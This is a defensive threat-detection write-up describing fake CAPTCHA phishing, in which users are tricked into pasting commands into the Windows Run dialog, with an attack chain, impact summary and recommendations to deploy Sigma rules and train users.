Potential Fake CAPTCHA Phishing Attack via Command Line

This detection identifies potential fake CAPTCHA phishing attacks targeting Windows users. The attack relies on compromised websites with browser injects that display fake CAPTCHAs or fake error messages. The user is then instructed to copy and paste a malicious command into the Windows Run dialog box, which executes via PowerShell, Cmd, or Mshta. This technique deceives users into running arbitrary code disguised as a legitimate verification or fix, potentially leading to malware installation or system compromise. The rule focuses on identifying suspicious command-line activity originating from explorer.exe, and containing CAPTCHA-related keywords, indicating a high likelihood of a phishing attempt. This activity started being tracked around August 2025 and continues to be a relevant threat.

Attack Chain

1. User visits a compromised website displaying a fake CAPTCHA or error message.
2. The website instructs the user to copy a command containing CAPTCHA-related keywords.
3. The user pastes the command into the Windows Run dialog box.
4. Explorer.exe launches either PowerShell, cmd.exe, or mshta.exe.
5. The launched process executes the malicious command.
6. The malicious command may download and execute further payloads or scripts.
7. These payloads can lead to malware installation or system compromise.
8. The attacker gains unauthorized access or control over the system.

Impact

Successful execution of these attacks can lead to system compromise, data theft, or malware installation. Victims are tricked into running malicious commands, bypassing traditional security measures. The impact ranges from individual system infections to potential network-wide breaches if the initial foothold is used for lateral movement. A successful attack could result in significant data loss, financial damages, and reputational harm.

Recommendation

• Deploy the Sigma rule “Potential Fake CAPTCHA Phishing Attack via PowerShell” to your SIEM to detect suspicious command-line activity related to fake CAPTCHAs.
• Deploy the Sigma rule “Potential Fake CAPTCHA Phishing Attack via Mshta” to your SIEM to detect suspicious command-line activity related to fake CAPTCHAs.
• Investigate any alerts generated by these rules by examining the command line arguments, parent processes, and network connections.
• Enable Sysmon process creation logging to provide detailed information about process executions.
• Implement user awareness training to educate users about the dangers of copying and pasting commands from untrusted websites.